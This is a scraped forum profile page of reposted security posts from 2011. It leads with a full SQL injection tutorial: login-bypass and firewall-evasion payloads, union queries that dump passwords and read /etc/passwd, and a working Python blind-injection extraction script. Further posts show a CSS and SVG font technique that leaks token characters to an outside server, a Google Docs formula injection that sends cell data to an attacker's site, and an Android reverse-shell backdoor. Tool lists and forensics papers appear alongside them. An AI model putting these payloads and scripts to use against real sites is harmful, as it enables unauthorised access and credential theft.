-
Posts
18732 -
Joined
-
Last visited
-
Days Won
710
Everything posted by Nytro
-
[h=1]False SQL Injection and Advanced Blind SQL Injection[/h] ######################################################################### # # # Exploit Title: False SQL injection and advanced blind SQL injection # # Date: 21/12/2011 # # Author: wh1ant # # Company: trinitysoft # # Group: secuholic # # # # ### ## # # ###### ###### # # ## ## ### ## # # ## ## # # ### ### # # ### ### # # ### # # ### # # ############ ########### # # ############################ # # ############################## # # ############################# # # # ############################ # # # # #### ############ #### # # # # ##### ########## ##### # # # # ###################### ## # # ## #################### ## # # ## ################## ## # # # ## ################ ## # # # # ## ############## ## # # # ## ## ############ ## ## # # ## ## ########## ## ## # # # ## ######## ## # # # ## ###### ## # # ## #### ## # # ## ## ## # # ## ## # # ## ## # # ### ### # # # ######################################################################### This document is written for publicizing of new SQL injection method about detour some web firewall or some security solution. I did test on a web firewall made in Korean, most SQL injection attack was hit, I will not reveal the maker for cutting its damage. In order to read this document, you have to understand basic MySQL principles. I classified the term "SQL Injection" as 2 meanings. The first is a general SQL Injection, we usually call this "True SQL Injection", and the second is a "False SQL Injection". Though in this documentation, you can know something special about "True SQL Injection" And I mean to say it's true that my method (False SQL Injection) is different from True/False SQL Injection mentioned in "Blind SQL Injection". A tested environment was as follow. ubuntu server 11.04 mysql 5.1.54-1 Apache 2.2.17 PHP 5.3.5-1 A tested code was as follow. <?php /* create database injection_db; use injection_db; create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num)); insert into users values(1, 'admin', 'ad1234'); insert into users values(2, 'wh1ant', 'wh1234'); insert into users values(3, 'secuholic', 'se1234'); *** login.php *** */ if(empty($_GET['id']) || empty($_GET['password'])){ echo "<html>"; echo "<body>"; echo "<form name='text' action='login.php' method='get'>"; echo "<h4>ID <input type='text' name='id'><br>"; echo "PASS<input type='password' name='password'><br></h4>"; echo "<input type='submit' value='Login'>"; echo "</form>"; echo "</body>"; echo "</html>"; } else{ $id = $_GET['id']; $password = $_GET['password']; $dbhost = 'localhost'; $dbuser = 'root'; $dbpass = 'pass'; $database = 'injection_db'; $db = mysql_connect($dbhost, $dbuser, $dbpass); mysql_select_db($database,$db); $sql = mysql_query("select * from users where id='$id' and password='$password'") or die (mysql_error()); $row = mysql_fetch_array($sql); if($row[id] && $row[password]){ echo "<font color=#FF0000><h1>"."Login sucess"."</h1></u><br>"; echo "<h3><font color=#000000>"."Hello, "."</u>"; echo "<font color=#D2691E>".$row[id]."</u></h3><br>"; } else{ echo "<script>alert('Login failed');</script>"; } mysql_close($db); } ?> First, basic SQL Injection is as follow. ' or 1=1# The code above is general SQL Injection Code, and this writer classified the code as "True SQL Injection". When you log on to some site, in internal of web program, your id and password are identified by some statement used "select id, password from table where id='' and password='', you can easily understand when you think 0 about character single quotation mark. Empty space is same as 0, the attack is possible using = and 0. As a result, following statement enables log on process. '=0# We can apply it in a different way. This is possible as 0>-1 '>-1# Also, this is possible as 0<1 '<1# You don't have to use only single figures. You can use two figures attack as follow. 1'<99# Comparison operation 0=1 will be 0, the following operation result is true because of id=''=0(0=1). '=0=1# Additionally there is some possible comparison operation making the same value each other. '<=>0# Like this, if you use the comparison operation, you can attack as additional manner. '=0=1=1=1=1=1# '=1<>1# '<>1# 1'<>99999# '!=2!=3!=4# In this time, you get the turn on understanding False SQL injection. the following is not attack but operation for MySQL. mysql> select * from users; +-----+-----------+----------+ | num | id | password | +-----+-----------+----------+ | 1 | admin | ad1234 | | 2 | wh1ant | wh1234 | | 3 | secuholic | se1234 | +-----+-----------+----------+ 3 rows in set (0.01 sec) This shows the contents in any table without any problem. The following is the content when you don't input any value in the id mysql> select * from users where id=''; Empty set (0.00 sec) Of course there is not result because id field dosen't have any string. In the truth, I have seen the case that in the MySQL if string field has a 0, the result is true. Based on the truth, following statement is true. mysql> select * from users where id=0; +-----+-----------+----------+ | num | id | password | +-----+-----------+----------+ | 1 | admin | ad1234 | | 2 | wh1ant | wh1234 | | 3 | secuholic | se1234 | +-----+-----------+----------+ 3 rows in set (0.00 sec) If you input 0 in id, All the content is showed. This is the basic about "False SQL Injection". After all, result of 0 makes log on process success. For making the result 0, you need something processing integer, in that time you can use bitwise operations and arithmetic operations. Once I'll show bitwise operation example. Or bitwise operation is well known for any programmer. And as I told you before, '' is 0, if you operate "0 bitwise OR 0", the result is 0. So the following operation succeed log on as the False SQL Injection. '|0# Naturally, you can use AND operation. '&0# This is the attack using XOR '^0# Also using shift operation is enable. '<<0# '>>0# If you apply like those bitwise operations, you can use variable attack methods. '&''# '%11&1# '&1&1# '|0&1# '<<0|0# '<<0>>0# In this time, I will show "False SQL Injection" using arithmetic operations. If the result is 0 using arithmetic operation with '', attack will be success. The following is the example using arithmetic operation. '*9# Multiplication '/9# Division. '%9# Mod '+0# Addition '-0# Subtraction Significant point is that the result has to be under one. Also you can attack as follow. '+2+5-7# '+0+0-0# '-0-0-0-0-0# '*9*8*7*6*5# '/2/3/4# '%12%34%56%78# '/**/+/**/0# '-----0# '+++0+++++0*0# Next attack is it using fucntion. In this document, I can't show all the functions. Because this attack is not difficult, you can use the "True, False SQL Injection" attack with function as much as you want. And whether this attack is "True SQL Injection" or "False SQL Injection" is decided on the last operation after return of function. '<hex(1)# '=left(0x30,1)# '=right(0,1)# '!=curdate()# '-reverse(0)# '=ltrim(0)# '<abs(1)# '*round(1,1)# '&left(0,0)# '*round(0,1)*round(0,1)# Also, you can use attack using space in function name. But you are able to use the space with only some function. '=upper (0)# In this time, SQL keyword is method. This method is also decided as True or False Injection according to case. ' <1 and 1# 'xor 1# 'div 1# 'is not null# admin' order by' admin' group by' 'like 0# 'between 1 and 1# 'regexp 1# Inputting id or password in the field without annotaion is possible about True, False SQL Injection. Normal Web Firewalls filter #, --, /**/, so the method is more effective in the Web Firewalls. ID : '=' PASS: '=' ID : '<>'1 PASS: '<>'1 ID : '>1=' PASS: '>1=' ID : 0'='0 PASS: 0'='0 ID : '<1 and 1>' PASS: '<1 and 1>' ID : '<>ifnull(1,2)='1 PASS: '<>ifnull(1,2)='1 ID : '=round(0,1)='1 PASS: '=round(0,1)='1 ID : '*0*' PASS: '*0*' ID : '+' PASS: '+' ID : '-' PASS: '-' ID :'+1-1-' PASS:'+1-1-' All attacks used in the documentation will be more effective with using bracket when detouring web firewall. '+(0-0)# '=0<>((reverse(1))-(reverse(1)))# '<(8*7)*(6*5)*(4*3)# '&(1+1)-2# '>(0-100)# Let's see normal SQL Injection attack. ' or 1=1# If this is translated in hexdemical, the result is as follow. http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&password=1234 Like attack above is basically filtered. So that's not good attack, I will try detour filtering using tab(%09) standing in for space(%20). In truth, you can use %a0 on behalf of %09. The possible values are as follow. %09 %0a %0b %0c %0d %a0 %23%0a %23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a The following is the example using %a0 instead of %20. http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234 In this time, I will show "Blind SQL injection" attack, this attack can't detour web firewall filtering, but some attacker tend to think that Blind SQL Injection attack is impossible to log on page. So I decided showing this subject. The following attack code can be used on log on page. And the page will show id and password. 'union select 1,group_concat(password),3 from users# This attack code brings /etc/password information. 'union select 1,load_file(0x2f6574632f706173737764),3 from users# Dare I say it without union select statement using Blind SQL injection with and operation is possible. The result of record are three. admin' and (select count(*) from users)=3# Let's attack detouring web firewall using Blind SQL Injection. The following is vulnerable code to Blind SQL Injection. <?php /*** info.php ***/ $n = $_GET['num']; if(empty($n)){ $n = 1; } $dbhost = 'localhost'; $dbuser = 'root'; $dbpass = 'root'; $database = 'injection_db'; $db = mysql_connect($host, $dbuser, $dbpass); mysql_select_db($database,$db); $sql = mysql_query("select * from `users` where num=".$n) or die (mysql_error()); $info = @mysql_fetch_row($sql); echo "<body bgcolor=#000000>"; echo "<h1><font color=#FFFFFF>wh1ant</font>"; echo "<font color=#2BF70E> site for blind SQL injection test</h1><br>"; echo "<h1><font color=#2BF70E>num: </font><font color=#D2691E>".$info[0]."</font></h1>"; echo "<h1><font color=#2BF70E>user: </font><font color=#D2691E>".$info[1]."</font>"; echo "<body>"; mysql_close($db); ?> Basic Blind SQL Injection is as follow on like above. http://127.0.0.1/info.php?num=1 and 1=0 http://127.0.0.1/info.php?num=1 and 1=1 But using = operation is possible for Blind SQL Injection. http://192.168.137.129/info.php?num=1=0 http://192.168.137.129/info.php?num=1=1 Also other operation is possible naturally. http://127.0.0.1/info.php?num=1<>0 http://127.0.0.1/info.php?num=1<>1 http://127.0.0.1/info.php?num=1<0 http://127.0.0.1/info.php?num=1<1 http://127.0.0.1/info.php?num=1*0*0*1 http://127.0.0.1/info.php?num=1*0*0*0 http://127.0.0.1/info.php?num=1%1%1%0 http://127.0.0.1/info.php?num=1%1%1%1 http://127.0.0.1/info.php?num=1 div 0 http://127.0.0.1/info.php?num=1 div 1 http://127.0.0.1/info.php?num=1 regexp 0 http://127.0.0.1/info.php?num=1 regexp 1 http://127.0.0.1/info.php?num=1^0 http://127.0.0.1/info.php?num=1^1 Attack example: http://127.0.0.1/info.php?num=0^(locate(0x61,(select id from users where num=1),1)=1) http://127.0.0.1/info.php?num=0^(select position(0x61 in (select id from users where num=1))=1) http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e) http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e) http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e) http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e) http://127.0.0.1/info.php?num=0^(id=0x61646d696e) http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5) http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5) If I will show all attack, I have to take much time, So I stopped in this time. Blind SQL Injection is difficult manually, So using tool will be more effective. I will show a tool made python, this is an example using ^(XOR) bitwise operation. In order to make the most of detouring the web firewall, I replaced space with %0a. #!/usr/bin/python ### blind.py ### import urllib import sys import os def put_data(true_url, true_result, field, index, length): for i in range(1, length+1): for j in range(32, 127): attack_url = true_url + "^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)" % (j,field,index,i,i) attack_open = urllib.urlopen(attack_url) attack_result = attack_open.read() attack_open.close() if attack_result==true_result: ch = "%c" % j sys.stdout.write(ch) break print "\t\t", def get_length(false_url, false_result, field, index): i=0 while 1: data_length_url = false_url + "^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)" % (field,index,i) data_length_open = urllib.urlopen(data_length_url) data_length_result = data_length_open.read() data_length_open.close() if data_length_result==false_result: return i i+=1 url = "http://127.0.0.1/info.php" true_url = url + "?num=1" true_open = urllib.urlopen(true_url) true_result = true_open.read() true_open.close() false_url = url + "?num=0" false_open = urllib.urlopen(false_url) false_result = false_open.read() false_open.close() print "num\t\tid\t\tpassword" fields = "num", "id", "password" for i in range(1, 4): for j in range(0, 3): length = get_length(false_url, false_result, fields[j], i) length = put_data(false_url, true_result, fields[j], i, length) print "" To its regret, the attack test is stopped for no time, if anyone not this writer studies some attack codes additionally, it will be easy for him to develop the attack. # Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt [EOF] Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials
-
Sfinte cacat, nu va bateti joc de aceasta categorie.
-
Ce pula mea "tutoriale" sunt astea? Nu mai postati toate rahaturile.
-
[h=1]30 Best Sources For Linux / *BSD / Unix Documentation On the Web[/h]by Vivek Gite on December 21, 2011 Man pages are written by sys-admin and developers for IT techs, and are intended more as a reference than as a how to. Man pages are very useful for people who are already familiar with Linux, Unix, and BSD operating systems. Use man pages when you just need to know the syntax for particular commands or configuration file, but they are not helpful for new Linux users. Man pages are not good for learning something new for the first time. Here are thirty best documentation sites on the web. Link: http://www.cyberciti.biz/tips/linux-unix-bsd-documentations.html
-
Modificare limita 10 posturi pentru a posta la sectiunea ajutor
Nytro replied to crs12decoder's topic in Sugestii
Cati au primit avertisment sau ban pentru ca au postat acolo si nu aveau 10 posturi? Poate 2-3 care au venit cu intrebari si cereri idioate. Nu s-au dat decat probabil cateva avertismente pentru asa ceva, in functie de postul cu pricina. Nu tinem mult la acea regula, insa pana la urma e utila. De ce sa fie toti leecheri sa nu contribuie cu nimic? In primul rand se poate prezenta, de acolo ne facem o idee despre persoana in cauza si poate toleram chiar si o cerere stupida. Apoi, oricine poate posta o stire din IT sau ceva util. -
[h=1]Probably the Best Free Security List in the World[/h]Updated 21. December 2011 - 4:27 by ako 1. Introduction / Keys / What's New 2. Realtime Protection 3. Scanners 4. Virus Removal Tools 5. Online Scanners 6. Firewalls 7. HIPS 8. System Hardening-HIPS 9. System Hardening 10. Sandboxing / Virtualization 11. Vulnerability Scanning 12. Browser Security 13. IP-Blocking/Hardening 14. Privacy 15. System Monitoring 16. Network Traffic Monitoring 17. System Cleaning 18. Data Rescue 19. Encrypting 20. Backup 21. System Rescue 22. Miscellaneous 23. Tests & Analysis Tools 24. Vista/Windows 7 Security 25. My Choices and More Link: http://www.techsupportalert.com/content/probably-best-free-security-list-world.htm
-
- 1
-
-
ExploitHub is the first legitimate marketplace for validated, non-zero-day exploits Link: https://www.exploithub.com/
-
[h=4]Securitytube Metasploit Framework Expert ( Armitage )[/h] Description: This video, part of the SecurityTube Metasploit Framework Expert series, introduces Armitage. You'll learn the basic use of Armitage and see a demonstration. This video also covers some of the advanced features: dynamic workspaces, team collaboration, and reporting. Sursa: Securitytube Metasploit Framework Expert ( Armitage ) Da, tutorial despre Armitage...
-
[h=4]Execute Binary In The Alternate Data Stream[/h]Un truc simplu si posibil util. Description: Since Vista the start-command ist forbidden for ADS. Here a workaround Sursa: Execute Binary In The Alternate Data Stream
-
[h=4]How Not To Implement Cryptography For The Owasp Top 10[/h] Description: How NOT to Implement Cryptography for the OWASP Top 10 (Reloaded) with Anthony J. Stieber Sursa: How Not To Implement Cryptography For The Owasp Top 10
-
Backdoor in Android for No-Permissions Reverse Shell Security expert Thomas Cannon working at viaForensics as the Director of R&D has demonstrated a custom-developed app that installs a backdoor in Android smartphones – without requiring any permissions or exploiting any security holes. Thomas built an app which requires no permissions and yet is able to give an attacker a remote shell and allow them to execute commands on the device remotely from anywhere in the world. The functionality they are exploiting to do this is not new, it has been quietly pointed out for a number of years, and was explained in depth at Defcon 18. It is not a zero-day exploit or a root exploit. They are using Android the way it was designed to work, but in a clever way in order to establish a 2-way communication channel. This has been tested on Android versions ranging from 1.5 up to 4.0 Ice Cream Sandwich, and it works in a similar way on all platforms. The application operates by instructing the browser to access a particular web page with specific parameters. This web page, and the server behind it, will, in turn, control the app by forwarding the browser to a URL that starts with a protocol prefix that is registered as being handled by the app, for example app://. This process can then be repeated and in doing so it enables two-way communication. "In this demonstration Android’s power and flexibility were perhaps also its downfall. Other smartphone platforms may not offer the controls we are bypassing at all, and the multi-tasking capabilities in Android allowed us to run the attack almost transparently to the user. This power combined with the open nature of Android also facilitates the customisation of the system to meet bespoke security requirements. This is something we have even been involved in ourselves by implementing a proof of concept Loadable Kernel Module to pro-actively monitor and defend a client’s intellectual property as it passed through their devices. It is no surprise that we have seen adoption of Android research projects in the military and government as it can be enhanced and adapted for specific security requirements, perhaps like no other mobile platform before it." Thomas Cannon said. Sursa: Backdoor in Android for No-Permissions Reverse Shell | The Hacker News (THN)
-
CSS - The sexy assasin Tactical Exploitation using CSS Old Attacks New Research New Attacks Download: http://www.megaupload.com/?d=2E0FY6BJ De interes: Access DOM attributes using CSS: This example is just a very simple proof of concept -- showing that we can enumerate arbitrary attribute value characters. It performs five positive tests and one negative test. Just to be sure. Now, what happens here? First of all you see an animation, resizing a pack of boxes. This is necessary because of a render bug in Webkit -- but not necessarily important for the attack itself. I just had to implement it because of a faulty dimensioning of boxes applied with external fonts. So -- the essence of the attack is, that we cam map attribute content into the DOM by using CSS :after and content:attr(href) for example. This mapped attribute content can be styled with a custom font. The magic is in those fonts - each font is only supplied with one visible character - and all other characters having zero dimension. That means that only the dimensioned character will be displayed and all others won't. @font-face { font-family: TestS; src: url(test_S.svg#TestS) format("svg"); } @font-face { font-family: TestE; src: url(test_E.svg#TestE) format("svg"); } @font-face { font-family: TestC; src: url(test_C.svg#TestC) format("svg"); } @font-face { font-family: TestR; src: url(test_R.svg#TestR) format("svg"); } @font-face { font-family: TestZ; src: url(test_Z.svg#TestZ) format("svg"); } @font-face { font-family: TestT; src: url(test_T.svg#TestT) format("svg"); } div { border: 1px solid red; height: 20px; overflow-x: none; overflow-y: auto; -webkit-animation-duration: 5s; -webkit-animation-name: decrease; } div a:after { color:white; } div.a a:after { content: attr(href); font-family: TestS; } div.b a:after { content: attr(href); font-family: TestE; } div.c a:after { content: attr(href); font-family: TestZ; } div.d a:after { content: attr(href); font-family: TestT; } div.e a:after { content: attr(href); font-family: TestC; } div.f a:after { content: attr(href); font-family: TestR; } So -- only if a character existing in that font is part of the attribute value, the mapped content will have dimension. If we squeeze the box a bit, we will get a scrollbar. But only if the font-character match is given This is one of those magic "only one char has dimension" fonts I created for the PoC, testing for the letter S: http://html5sec.org/webkit/test_S.svg That "one char only dimension" thing connected with the squeezing means, if we can find out, when the scrollbar appears, we can know which character is part of the attribute value. Now - how can we create a scrollbar, that is able to notify an external resource the second it starts to appear? Well, Webkit has a special feature that allows to fully style scrollbars. We can of course also define a background image for a scrollbar. Too bad is just, that if we do that, the image will be fetched onload. So it's more or less useless. But -- Webkit also supports tons of pseudo classes for scrollbar styles (srsly - tons: http://trac.webkit.org/export/41842/trunk/LayoutTests/scrollbars/overflow-scrollbar-combinations.html - I mean, you know it already I assume . And some of those make sure that background images assigned to the selected elements and states will only be loaded once they actually appear. Bam -- there we have our smart scrollbar of doom. div::-webkit-scrollbar { width: 12px; } div.a::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/S); } div.b::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/E); } div.c::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/Z); } div.d::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/T); } div.e::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/C); } div.f::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/R); } Now if we glue the whole thing together, we simply need the following ingredients: * A CSS injection * Some or two CSRF protected links with a token * One SVG font per character to determine * A server listening for incoming requests The SVG fonts were chosen since they are insanely easy to create. Just set the path and some attributes of any glyph but the desired one to null and done -- we have the perfect font where every character but one is invisible. The animation has to be there because of the aforementioned dimensioning bug - if there's no animation, the background image requests will fire even for those characters tests who don't result in a visible character. @-webkit-keyframes decrease { from { width: 340px; } 50% { width:105px; } 100% { width:340px; } } To fully enjoy the demo, make sure you have a look at the Network tab in the developer tools. You'll see requests for the characters S,E,C,R,T - but none for Z. Z was referenced in the demo with a dedicated test as well. This is our negative test proving that it really works. So - conclusion: We can enumerate characters via CSS -- that is not new since SDC et al. did this with the Sexy Assassin back in 2009 (was it?). With Webkit nevertheless we can do it FAST and without a massive footprint. My suggestion for a fix would be: simply make sure that scrollbars and their numerous components and states cannot request external resources once they appear/change state -- but fetch their stuff onload so we can avoid attacks like these. The only think making this attack work is the fact that some parts of the scrollbar loads data from an external machine on visibility/appearance -- and not on declaration in the style-sheet. Sursa: http://html5sec.org/webkit/test
-
[h=3]Excel formula injection in Google Docs[/h][h=2]December 21, 2011[/h] Surely all of you know about Google reward program for information security researchers who provide information about weak spots of Google resources. We had the chance to participate in this program, too. Here is a short story from @_chipik and @asintsov. One day we needed to conduct a small survey, and we decided to use Google Docs as platform for the survey. There is an object in Google Docs called Google Forms, and, as obvious from the name, it is used to create various surveys and tests forms. After a form is created, its URL is published on the Internet or sent to people who are to participate in the survey. This is how the form looks for a participant: And this is how the author sees the participant's answers: I suppose that any web researcher upon seeing a form instinctively puts ‘,",> and other interesting symbols here? We tried it, too. However, everything was encoded and filtered exactly as planned. Well… But all of user input is inserted into an Excel table, so why don't we try to inject some formula? Excel formulas start with an “=”. OK, let’s give it a try. Fail. Cunning Google puts a space symbol before the "=" so that the formula is taken for a simple text cell. So how do we get rid of the space? Easy as pie: use backspace %08 is the Hex code of the backspace key. Thus, we wrote in the entry field: %08=1+2+C3 Voila! The formula got inserted into the table just fine. All we had to do now was devise an interesting and practical vector for this particular injection. Google Functions helped us here. With the help of Google Functions it was possible to execute a request to any domain so that the request results got inserted into a specified cell. That gave us the following attack vector: 1) Put sensitive user data into A1 cell (or probably they are already there) 2) Put a formula which makes GET request to http://own_site.com/secret_data_in_base64 into Z666 cell. 3) Read web server logs, get data from cells. 4) Profit! Soon after describing the bug and the possible attack vector we got the following letter: And a bit later we saw our names in Google Hall of Fame Finally, a little Google Hack Posted by DSecRG Sursa: Digital Security Research Group: Excel formula injection in Google Docs
-
Metasploit Tutorial: An introduction to Metasploit Community
Nytro posted a topic in Tutoriale video
[h=2]Metasploit Tutorial: An introduction to Metasploit Community[/h]Posted by Christian Kirsch on Dec 21, 2011 7:50:48 AM Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product. Scanning Networks with Metasploit Community Basic Exploitation with Metasploit Community Basic Exploitation vs. Smart Exploitation Importing Nexpose Scan Data into Metasploit Using Metasploit Community with Nexpose If you don't have them already, download the free Metasploit Community Edition penetration testing tool and the free Nexpose Community Edition vulnerability scanner now! Videos: https://community.rapid7.com/community/solutions/metasploit/blog/2011/12/21/metasploit-tutorial-an-introduction-to-metasploit-community -
Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 A developer who calls himself T Rizk doesn't have much faith in Congress making the right decision on anti-piracy legislation, so he's built a work around for the impending censorship measures being considered DeSOPA. The Firefox add-on is stunningly simple as the Stop Online Piracy Act (SOPA) would block specific domain names (e.g. Download music, movies, games, software! The Pirate Bay - The world's most resilient BitTorrent site) of allegedly infringing sites. Firefox, which already boasts an outspoken stance against SOPA, and has already shown they are willing to stand by add-on developers who create circumvention extensions designed to go around measures currently employed by Homeland Security, has welcomed a new add-on, one that is designed to circumvent whatever SOPA website blacklists that are created, provided the bills become law. A new anti-SOPA add-on for Firefox, titled “DeSopa” is such a counter measure.When installed, users can click a single button to resolve a blocked domain via foreign DNS servers, bypassing all domestic DNS blockades and allowing the user to browse the site though the bare IP-address (if supported).“I feel that the general public is not aware of the gravity of SOPA and Congress seems like they are about to cater to the special interests involved, to the detriment of Internet, for which I and many others live and breathe,” DeSopa developer T Rizk told. “It could be that a few members of congress are just not tech savvy and don’t understand that it is technically not going to work, at all. So here’s some proof that I hope will help them err on the side of reason and vote SOPA down,” he adds. If SOPA is implemented, thousands of similar and more innovative programs and services will sprout up to provide access to the websites that people frequent. SOPA is a mistake. It does not even technically help solve the underlying problem, as this software illustrates. What it will do is give undue leverage to predatory organizations, cripple innocent third party websites, severely dampen digital innovation and negatively impact the integrity and security of the Internet. If browsing a site through a single IP address is not supported, this other anti-SOPA plugin provides an alternative. Sursa: Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 | The Hacker News (THN)
-
Hunting malware with Volatility v2.0 Frank Boldewin CAST Forum December 2011 (English edition) What is Volatility? - Forensics framework to acquire digital artifacts from memory dumps - Completely written in Python - Current stable version is 2.0.1 - Easy to use plugin interface - Supports the following x86 Windows versions - Windows XP SP 2, 3 - Windows 2003 Server SP 0, 1, 2 - Windows Vista SP 0, 1, 2 - Windows 2008 Server SP 1, 2 - Windows 7 SP 0, 1 Download: http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf Sursa: CAST Slides: Hunting malware with Volatility v2.0 | Offensive Computing
-
A simple HTML tag will crash 64-bit Windows 7 0-day leaves kernel in the wrong iframe of mind By John Leyden An unpatched critical flaw in 64-bit Windows 7 leaves computers vulnerable to a full 'blue screen of death' system crash. The memory corruption bug in x64 Win 7 could also allow malicious kernel-level code to be injected into machines, security alert biz Secunia warns. Fortunately the 32-bit version of Windows 7 is immune to the flaw, which has been pinned down to the win32k.sys operating system file - which contains the kernel portion of the Windows user interface and related infrastructure. Proof-of-concept code showing how to crash vulnerable Win 7 boxes has been leaked: the simple HTML script, when opened in Apple's Safari web browser, quickly leads to the kernel triggering a page fault in an unmapped area of memory, which halts the machine at a blue screen of death. The offending script is just an IFRAME tag with an overly large height attribute. Although Safari is required to spark the system crash via HTML, modern operating systems should not allow usermode applications to bring down the machine. Microsoft is now investigating the vulnerability, which was first reported by Twitter user w3bd3vil, although the software giant is racing against hackers tracing the code execution path to discover the underlying vulnerability in Windows 7. A video of the Safari-triggered crash along with the HTML PoC can be . Other exploit scenarios might also be possible.Demo: Sursa: A simple HTML tag will crash 64-bit Windows 7 • The Register More info: http://www.pcworld.com/businesscenter/article/246767/new_zeroday_vulnerability_in_windows_7_64bit_may_allow_remote_code_execution.html
-
[h=1]SSLyze: A Fast and Full-Featured SSL Scanner![/h]by Mayuresh on December 21, 2011 When we wrote the “list of SSL scanners for penetration testers” post, in August this year, little did we know that we would have to update it this soon. We have since updated the list with SSLyze, a fast and full featured SSL scanner. It is brought to us by the iSEC Partners. SSLyze is a stand-alone Python application that looks for classic SSL mis-configurations, while providing the advanced user with the opportunity to customize the application via a simple plugin interface. This open source, cross-platform tool will help you with analyzing the configuration of SSL servers and for identifying mis-configurations such as the use of outdated protocol versions, weak hash algorithms in trust chains, insecure renegotiation, and session resumption settings. [h=2]Features of SSLyze:[/h] Insecure renegotiation testing Scanning for weak strength ciphers Checking for SSLv2, SSLv3 and TLSv1 versions Server certificate information dump and basic validation Session resumption capabilities and actual resumption rate measurement Support for client certificate authentication Simultaneous scanning of multiple servers, versions and ciphers For example, SSLyze can help user’s identify server configurations vulnerable to THC’s recently released SSL DOS attack, by checking the server’s support for client-initiated re-negotiations. As we have already mentioned, it is cross-platform. It supports 64-bit and 32-bit Windows and Linux operating systems. All it needs is the following sets of packages: Windows: Python 2.6 or 2.7 and OpenSSL 1.0.0c Linux: Python 2.6 or 2.7 and OpenSSL 0.9.8+ [h=3]Install SSLyze:[/h] # yum install python26 openssl # wget http://sslyze.googlecode.com/files/sslyze-0.3_src.zip # unzip sslyze-0.3_src.zip # cd sslyze-0.3_src [h=3]SSLyze usage:[/h] $ python sslyze.py [options] www.target1.com www.target2.com:443 It supports the following options to provide a granular control: Regular Scan “–regular“: Performs a regular scan. It’s a shortcut for –sslv2 –sslv3 –tlsv1 –reneg –resum –certinfo=basic. OpenSSL Cipher Suites “–sslv2“, “–sslv3“, “–tlsv1“: Lists the SSL 2.0 / SSL 3.0 / TLS 1.0 OpenSSL cipher suites supported by the server. Session Renegotiation “–reneg“: Checks whether the server is vulnerable to insecure renegotiation. Session Resumption “–resum“: Tests the server for session resumption support, using both session IDs and TLS session tickets (RFC 5077). Session Resumption Rate “–resum_rate“: Estimates the average rate of successful session resumptions by performing 100 session resumptions. Server Certificate “–certinfo=basic“: Verifies the server’s certificate validity against Mozilla’s trusted root store, and prints relevant fields of the certificate. Additional options providing client certificate support and connection timeout variables are also available. [h=3]Download SSLyze:[/h] SSLyze v0.3 – sslyze-0.3_src.zip – Downloads - sslyze - Fast and Full-Featured SSL Scanner - Google Project Hosting Sursa: SSLyze: A Fast and Full-Featured SSL Scanner! — PenTestIT
-
Reversing Microsoft patches to reveal vulnerable code Harsimran Walia Computer Security Enthusiast The paper would try to reveal the vulnerable code for a particular disclosed vulnerability, which is the first and foremost step for making undisclosed exploit and patch verification. The process used herein could be used to create vulnerability based signatures which are far better than exploit signatures. Vulnerability signature is a superset of all the inputs satisfying a particular vulnerability condition whereas exploit based signature would only cater to one type of input satisfying that vulnerability condition. This paper would try to pin point the vulnerable code and the files in Microsoft products by reverse engineering the Microsoft patches. The method used would be to take a binary difference of the file which was patched taken at two different instances, one is the most recent file before patching and the second is after applying the patch but finding the two files is in itself another problem. Windows now releases two different versions of patches, GDR (General distribution) which contains only security related updates and the other QFE (Quick Fix Engineering) or LDR (Limited Distribution Release) which has both security related and functional updates. The problem addressed is that the versions of the two files to be compared should match that is either both should be GDR or LDR. The file after patching can be obtained by extracting the patch of the considered vulnerability. The second file to be compared with a matching version with the first one could be extracted from some other vulnerability patch addressing the issue with the same software disclosed just before the vulnerability considered. The process of extraction of files from patches differs in Vista and Windows 7 from the traditional way used in Windows XP. After obtaining the correct files to be compared, the next step would be to get a binary difference between the files which can be done very easily and effectively with the use of a tool called DarunGrim. The tool provides a well illustrated difference between the subroutines in the term of percentage match between them. Subroutines from both the files can be viewed in graph mode and can be compared to find the vulnerability. The change in the code is done to fix that particular vulnerability which may be removal of a piece of code and addition of another. Another problem arises at this point is that compiler optimizations happen every-time a code is compiled, so if both the files are compiled with different compilers or compiler versions, they would have different compiler optimizations and that would also show up as a change in code. Simple Instruction reordering keeps happening over different releases which give rise to another problem as when only the instructions are reordered, still it would show up as changed code. The code change in one of the functions out of several functions in the file before applying the patch would be the vulnerable code. From here knowledge of the reverse engineer would come into play as how effectively and fast he can find the vulnerability from the code shown as being changed from the previous file. Till now the process used was static analysis but from now onwards dynamic analysis would be used as breakpoints could be set at these changed functions and run the software. When a breakpoint is hit we can check in which of the functions is user input being dealt. Obtaining all this information can then be used to write an exploit. This process of reversing the patch and finding the details about the vulnerability would definitely help in creating vulnerability signatures. Download: http://nullcon.net/nullcon2011presentation/harsimranwalia_nullcon.pdf
-
